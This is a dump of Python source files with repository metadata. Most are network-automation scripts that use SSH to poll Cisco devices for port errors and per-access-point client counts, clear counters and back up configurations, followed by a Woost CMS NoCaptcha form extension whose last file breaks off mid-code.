paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show version | inc System serial|uptime|image|Model number\" + \"\\n\")\n# remote_conn.send(\"show version | inc \\*|uptime|image\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nshverstring = outp.decode(\"utf-8\")\nshverlist = shverstring.splitlines()\ndel shverlist[:3]\ndel shverlist[-1]\nuptimelist = shverlist[0].split('is ')\nuptime = uptimelist[1]\nimagelist = shverlist[1].split('/')\nimagetemp = imagelist[1]\nimage = imagetemp[:-1]\nmodellist = shverlist[2].split(': ')\nmodel = modellist[1]\nserialnumlist = shverlist[3].split(': ')\nserialnum = serialnumlist[1]\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\n# remote_conn.send(\"show ip int brief | exc down\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\ndel ipbrieflist[:4]\ndel ipbrieflist[-1]\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint('\\n')\nprint(\"=\" * 54 + \"\\n\" + 13 * \" \" + \"Device Port Error Report\" + \"\\n\" + \"=\" * 54)\nprint(\"Hostname:\\t\" + hostname)\nprint(\"IP address:\\t\" + ip_addr)\nprint(\"Model:\\t\\t\" + model)\nprint(\"Serial:\\t\\t\" + serialnum)\nprint(\"Uptime:\\t\\t\" + uptime)\nprint(\"Version:\\t\" + image)\nprint()\n\noutput_lines = []\nfor intf in ipbriefintlist:\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Internet'):\n del shintlist[:19]\n del shintlist[-1]\n elif shintlist[8].startswith(' input flow-control'):\n del shintlist[:19]\n del shintlist[-1]\n else:\n del shintlist[:18]\n del shintlist[-1]\n\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nstr_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\nrepr(str_object)\nwith open(outputfile, 'w') as f:\n f.write(\"=\" * 54 + \"\\n\" + 13 * \" \" + \"Device Port Error Report\" + \"\\n\" + \"=\" * 54 + \"\\n\")\n f.write(\"Hostname:\\t\" + hostname + \"\\n\")\n f.write(\"IP address:\\t\" + ip_addr + \"\\n\")\n f.write(\"Model:\\t\\t\" + model + \"\\n\")\n f.write(\"Serial:\\t\\t\" + serialnum + \"\\n\")\n f.write(\"Uptime:\\t\\t\" + uptime + \"\\n\")\n f.write(\"Version:\\t\" + image + \"\\n\")\n f.write(str_object)\n" }, { "alpha_fraction": 0.5678571462631226, "alphanum_fraction": 0.5848214030265808, "avg_line_length": 29, "blob_id": "ad374fc6f1a7704074640554640a772670a59330", "content_id": "7b594aa418d869ea6cf8fb049ac24ccdc3ffbd01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3360, "license_type": "no_license", "max_line_length": 111, "num_lines": 112, "path": "/Clients_per_AP/clients_per_ap_v2_temp.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.10\n# show client summary processing\n# @author mcs\n# 4/1/2018\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom collections import defaultdict\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"\\n\")\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n ssh_channel.send(\"show client summary\" + \"\\n\")\n d = defaultdict(int)\n\n time.sleep(0.9)\n outp = ssh_channel.recv(35000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n del shclisumlist[:22]\n del shclisumlist[-3:]\n for line in shclisumlist:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n d[ap_name] += 1\n\n total = sum(d.values())\n print(\"The total number of attached clients is: \", total)\n print()\n\n print('{:25}{:5}'.format(' AP', 'Count'))\n print('-' * 30)\n\n for k, v in d.items():\n if v > 30:\n print('{:25}{:5}'.format(k, d[k]), \" <----- Client count greater than 30.\")\n else:\n print('{:25}{:5}'.format(k, d[k]))\n\n\ndef main():\n # Get all devices from csv_file\n # csvfile = \"f:\\mark\\python\\Projects\\error_detect\\SwitchData.csv\"\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # ip_addrs = [item['ip_addr'] for item in device_list]\n # for item in device_list:\n # ip_addrs.append(item['ip_addr'])\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n x = 0\n starttime = time.time()\n while x < 1:\n i = 0\n for a_connection in ssh_conns:\n ap_data(a_connection)\n i += 1\n x += 1\n if x == 1:\n break\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5289036631584167, "alphanum_fraction": 0.5554817318916321, "avg_line_length": 29.100000381469727, "blob_id": "ddffce0c5b7aec1f1358a49157fc80379911f69b", "content_id": "f7eef7ff5f67626e39b35c4ee780490a390469d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1505, "license_type": "no_license", "max_line_length": 108, "num_lines": 50, "path": "/error_detect/clear_counters.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.1\n# clear counters\n# mcs\n# 5/16/2017\n\nimport paramiko\nimport time\nimport csv\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n \n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n print(output)\n \n ssh_channel.send(\"clear counters\" + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'confirm' in output:\n ssh_channel.send(\"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n print(output)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n print(\" Exiting...\")\n" }, { "alpha_fraction": 0.5894988179206848, "alphanum_fraction": 0.6628878116607666, "avg_line_length": 28.66371726989746, "blob_id": "71ed4cd4b0ba3d0530665bc11abe5727cf71119c", "content_id": "a64ba70e4535b629d874aa9f2237e0c00305d203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3352, "license_type": "no_license", "max_line_length": 112, "num_lines": 113, "path": "/error_detect/error_detect_0.30.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# port error detector\n# mcs\n# 5/1/2017\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint()\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nprint()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show int f0/1\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(mystring)\nmylist = mystring.splitlines()\nprint()\nerrors = mylist[21]\nprint(errors)\nerrors_list = errors.split(\",\")\nprint(\"errors_list: \" + str(errors_list))\nprint()\n\n\ndef striplist(errlist):\n return [item.strip() for item in errlist]\n\nerrors_list = striplist(errors_list)\nprint(\"errors_list: \" + str(errors_list))\n\nerrRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\nerrdict = {}\nfor elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n if int(mo.group(1)) > 0:\n print(\"There are errors\")\n else:\n print(\"There are no errors\")\n\nprint(errdict)\n\n\n# for elem in range(2, mylist_len - 1):\n # print(mylist[elem])\n\n# for elem in mylist:\n # if elem[0] or elem[1]:\n # continue\n # print(elem)\n\n# 20 - 27\n\nrtr-1841>\nshow ip int brief\nInterface IP-Address OK? Method Status Protocol\nFastEthernet0/0 unassigned YES NVRAM administratively down down \nFastEthernet0/1 192.168.1.204 YES NVRAM up up \nLoopback0 172.17.0.1 YES NVRAM up up \nrtr-1841>\nterminal length 0\nrtr-1841>show int f0/1\nFastEthernet0/1 is up, line protocol is up \n Hardware is Gt96k FE, address is 0021.5500.4fa1 (bia 0021.5500.4fa1)\n Internet address is 192.168.1.204/24\n MTU 1500 bytes, BW 100000 Kbit/sec, DLY 100 usec, \n reliability 255/255, txload 1/255, rxload 1/255\n Encapsulation ARPA, loopback not set\n Keepalive set (10 sec)\n Full-duplex, 100Mb/s, 100BaseTX/FX\n ARP type: ARPA, ARP Timeout 04:00:00\n Last input 00:00:00, output 00:00:00, output hang never\n Last clearing of \"show interface\" counters never\n Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0\n Queueing strategy: fifo\n Output queue: 0/40 (size/max)\n 5 minute input rate 1000 bits/sec, 1 packets/sec\n 5 minute output rate 1000 bits/sec, 1 packets/sec\n 2828 packets input, 267428 bytes\n Received 915 broadcasts (0 IP multicasts)\n 0 runts, 0 giants, 0 throttles\n 0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored\n 0 watchdog\n 0 input packets with dribble condition detected\n 3740 packets output, 453148 bytes, 0 underruns\n 0 output errors, 0 collisions, 2 interface resets\n 4 unknown protocol drops\n 0 babbles, 0 late collision, 0 deferred\n 0 lost carrier, 0 no carrier\n 0 output buffer failures, 0 output buffers swapped out\n" }, { "alpha_fraction": 0.5023022294044495, "alphanum_fraction": 0.5328589081764221, "avg_line_length": 28.862499237060547, "blob_id": "c515de518c4de17cdaacaca01e3878bd1ab2a89b", "content_id": "0b455404fefee59fe84c80bb0389290ec31aa60a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2389, "license_type": "no_license", "max_line_length": 108, "num_lines": 80, "path": "/config_backup/config_backup_0.2.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# @version 0.2\n# device backup\n# @author mcs\n# 5/19/2017\n\nimport paramiko\nimport csv\nimport time\n\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n\n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n \n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n hostlist = output.splitlines()\n hostname1 = hostlist[1]\n hostname = hostname1[:-1]\n\n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt quiet\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '-' + '%s' + '@' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n \n ssh_channel.send(\"dir flash:/\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(2000)\n output = outp.decode(\"utf-8\")\n \n if 'vlan.dat' in output:\n ssh_channel.send(\"copy flash:/vlan.dat tftp://192.168.1.106/\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy run tftp://192.168.1.106/\" + filename + \".cfg\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt noisy\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n print(hostname)\n print(\" Exiting...\" + \"\\n\")\n" }, { "alpha_fraction": 0.5331753492355347, "alphanum_fraction": 0.5485782027244568, "avg_line_length": 29.14285659790039, "blob_id": "48da5213784b0cdacfc5e3cf8dd3ad1040825205", "content_id": "7f33b572e28c994a96890edc0a9b66653f7d5cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/migrate_APs/set_ap_to_flexconnect.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\set_ap_to_flexconnect.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napnamelist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apnamelist.append(templist[0])\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for name in apnamelist:\n file2.write(\"config ap mode flexconnect {0}\\n\".format(name))\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5610988736152649, "alphanum_fraction": 0.5942857265472412, "avg_line_length": 28.9342098236084, "blob_id": "5d1f35a7bb63bd89a6b3aaffe22302642767bb36", "content_id": "f928eec1e34be3cb5ae05273ec13b3fae8f0f2d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4550, "license_type": "no_license", "max_line_length": 152, "num_lines": 152, "path": "/Clients_per_AP/clients_per_ap_v4.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.42\n# show client summary processing\n# @author mcs\n# 4/25/2018\n\n# https://stackoverflow.com/questions/41879712/python-list-of-lists-to-dataframe-assertionerror\n\n# https://stackoverflow.com/questions/42869544/dictionary-of-lists-to-dataframe\n\n# https://stackoverflow.com/questions/25292568/converting-a-dictionary-with-lists-for-values-into-a-dataframe\n\n# https://stackoverflow.com/questions/50008491/trying-to-create-a-seaborn-heatmap-from-a-pandas-dataframe/50008537?noredirect=1#comment87033687_50008537\n\nimport paramiko\nimport time\nimport re\nimport csv\nfrom collections import defaultdict\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(1.0)\n discard = ssh_channel.recv(10000)\n ssh_channel.send(\"show ap summary\" + \"\\n\")\n time.sleep(1.0)\n outp = ssh_channel.recv(100000)\n shapsumstring = outp.decode(\"utf-8\")\n shapsumlist = shapsumstring.splitlines()\n shapsumlist = shapsumlist[9:-2]\n regex1 = re.compile(r'(.+?)(?: 2)')\n regex2 = re.compile(r'(?:(?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))(?:\\s)(.+?)(?:\\s)')\n\n d = defaultdict(int)\n e = {}\n cols = []\n index = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']\n c = 0\n x = 0\n\n for line in shapsumlist:\n mo = regex1.search(line)\n ap_name = mo.group(1).rstrip()\n e[ap_name] = []\n cols.append(ap_name)\n\n while x < 9:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n for line in shclisumlist:\n mo = regex2.search(line)\n ap_name = mo.group(1)\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n d.clear()\n shclisumstring = ''\n shclisumlist.clear()\n\n for key in e:\n if len(e[key]) == c:\n e[key].append(0)\n c += 1\n\n if x == 8:\n\n df = pd.DataFrame(e, index=index, columns=cols)\n df = df.transpose()\n\n my_dpi = 96\n sns.set(font_scale=2)\n # plt.figure(figsize=(13, 91))\n plt.figure(figsize=(2016 / my_dpi, 9120 / my_dpi), dpi=my_dpi)\n\n sns.heatmap(df, cmap='RdYlGn_r', linewidths=0.5, annot=True, annot_kws={\"size\": 20})\n\n plt.savefig('d:\\\\python\\\\projects\\\\clients_per_ap\\\\ac.png')\n plt.show()\n\n # time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n time.sleep(15.0 - time.time() % 15.0)\n\n x += 1\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n ap_data(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
18
marticongost/woost.extensions.nocaptcha
https://github.com/marticongost/woost.extensions.nocaptcha
63c02117ba665664ff833103eb0cb2228d018b39
278a0235f2295e232ea0d96407c0c7e30470a38e
190ed9eeca3cabd984c5af5b3adef43c9479ce58
refs/heads/master
2020-08-16T17:18:47.935980
2019-06-03T08:38:13
2019-06-03T08:38:13
215,530,432
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7149122953414917, "alphanum_fraction": 0.719298243522644, "avg_line_length": 24.22222137451172, "blob_id": "20b2b5d96dfbc6f4d45df61ab95b9122bb19fc64", "content_id": "c727cba5ded9c121bc05f45c3bb350282daeb28c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/woost/extensions/nocaptcha/__init__.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom woost import app\nfrom . import settings, admin\nfrom .member import NoCaptcha, NoCaptchaValidationError\nfrom .form import add_nocaptcha, requires_nocaptcha\n\n" }, { "alpha_fraction": 0.6573875546455383, "alphanum_fraction": 0.659528911113739, "avg_line_length": 18.41666603088379, "blob_id": "babbbb9ea08935603fb5e7dde8cf6f2b0f549c44", "content_id": "6bb76d94e6f350614dcb4dbcaddcc22a0f4aff42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/woost/extensions/nocaptcha/settings.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail import schema\nfrom cocktail.translations import translations\nfrom woost.models import add_setting, Configuration\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.settings\")\n\nadd_setting(\n schema.String(\n \"x_nocaptcha_public_key\",\n text_search = False\n )\n)\n\nadd_setting(\n schema.String(\n \"x_nocaptcha_private_key\",\n text_search = False\n )\n)\n\n" }, { "alpha_fraction": 0.5590406060218811, "alphanum_fraction": 0.5701106786727905, "avg_line_length": 27.5, "blob_id": "84f99888096ac25d688bceefcb35d10e3e86d582", "content_id": "d195b6106be32488239f2aa730bf240173476af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1084, "license_type": "no_license", "max_line_length": 74, "num_lines": 38, "path": "/setup.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom setuptools import setup\n\nsetup(\n name = \"woost.extensions.nocaptcha\",\n version = \"0.0b1\",\n author = \"Whads/Accent SL\",\n author_email = \"[email protected]\",\n maintainer = \"Marti Congost\",\n maintainer_email = \"[email protected]\",\n url = \"http://woost.info\",\n description =\n \"\"\"\n Woost extension to integrate NoCaptcha controls.\n \"\"\",\n classifiers = [\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Web Environment\",\n \"Framework :: ZODB\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Natural Language :: Catalan\",\n \"Natural Language :: Spanish\",\n \"Programming Language :: Python :: 2\",\n \"Topic :: Internet :: WWW/HTTP :: Site Management\"\n ],\n install_requires = [\n \"woost>=3.0b1,<3.1\"\n ],\n packages = [\"woost.extensions.nocaptcha\"],\n include_package_data = True,\n zip_safe = False\n)\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6829836964607239, "avg_line_length": 25.78125, "blob_id": "5bd25a5b68c718521959e32c910739e4016fa546", "content_id": "5f81f9700059760b82879c791165aa69a7363836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 69, "num_lines": 32, "path": "/woost/extensions/nocaptcha/form.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail.events import when\nfrom .member import NoCaptcha\n\ndef add_nocaptcha(form, **member_kwargs):\n\n member_kwargs.setdefault(\"name\", \"nocaptcha\")\n member_kwargs.setdefault(\"member_group\", \"nocaptcha\")\n member = NoCaptcha(**member_kwargs)\n form.schema.add_member(member, append = True)\n\n if member.member_group and form.schema.groups_order:\n\n if not isinstance(form.schema.groups_order, list):\n form.schema.groups_order = list(form.schema.groups_order)\n\n form.schema.groups_order.append(member.member_group)\n\n form.adapter.exclude(member.name)\n return member\n\ndef requires_nocaptcha(form_class, **member_kwargs):\n\n @when(form_class.declared)\n def handler(e):\n add_nocaptcha(e.source, **member_kwargs)\n\n return form_class\n\n" }, { "alpha_fraction": 0.725239634513855, "alphanum_fraction": 0.7268370389938354, "avg_line_length": 23.038461685180664, "blob_id": "9ee082e3e8feaa0615792276f2561cf0e93eed37", "content_id": "f1fb5977b54952d925893ab0fbe657db6107a991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 75, "num_lines": 26, "path": "/woost/extensions/nocaptcha/admin/sections.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail.events import when\nfrom cocktail.translations import translations\nfrom woost.admin.sections import Settings\nfrom woost.admin.sections.contentsection import ContentSection\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.admin.sections\")\n\n\nclass NoCaptchaSection(Settings):\n\n icon_uri = \"woost.extensions.nocaptcha.admin.ui://images/nocaptcha.svg\"\n\n members = [\n \"x_nocaptcha_public_key\",\n \"x_nocaptcha_private_key\",\n ]\n\n\n@when(ContentSection.declared)\ndef fill(e):\n e.source.append(NoCaptchaSection(\"nocaptcha\"))\n\n" }, { "alpha_fraction": 0.621666669845581, "alphanum_fraction": 0.6225000023841858, "avg_line_length": 29.367088317871094, "blob_id": "9f90873c1f130e40de2424bc2e4465830f0e9173", "content_id": "0b403ded309fdf26feea380af0ddd30ec7f00089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 73, "num_lines": 79, "path": "/woost/extensions/nocaptcha/member.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nimport cherrypy\nfrom json import loads\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nfrom cocktail.translations import translations\nfrom cocktail import schema\nfrom cocktail.html.uigeneration import default_edit_control\nfrom cocktail.schema.exceptions import ValidationError\nfrom woost.models import get_setting\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.member\")\n\n\nclass NoCaptcha(schema.String):\n \"\"\"A member that handles noCaptcha values.\"\"\"\n\n VERIFY_SERVER = \"https://www.google.com/recaptcha/api/siteverify\"\n\n def __init__(self, name = None, *args, **kwargs):\n\n kwargs.setdefault(\"parameter_name\", \"g-recaptcha-response\")\n\n if not name:\n name = \"nocaptcha\"\n\n schema.String.__init__(self, name, *args, **kwargs)\n\n def _default_validation(self, context):\n \"\"\"Validation 